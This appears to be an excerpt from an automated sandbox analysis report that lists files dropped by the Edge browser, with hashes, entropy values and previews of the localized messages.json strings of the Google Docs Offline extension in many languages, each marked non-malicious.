                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):878
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                                  MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                                  SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                                  SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                                  SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2766
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                                  MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                                  SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                                  SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                                  SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):978
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                                  MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                                  SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                                  SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                                  SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):907
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                                  MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                                  SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                                  SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                                  SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                                  MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                                  SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                                  SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                                  SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):937
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                                  MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                                  SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                                  SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                                  SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1337
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                                  MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                                  SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                                  SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                                  SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2846
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                                  MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                                  SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                                  SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                                  SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                                  MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                                  SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                                  SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                                  SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                                  MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                                  SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                                  SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                                  SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1320
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                                  MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                                  SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                                  SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                                  SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):884
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                                  MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                                  SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                                  SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                                  SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):980
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                                  MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                                  SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                                  SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                                  SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
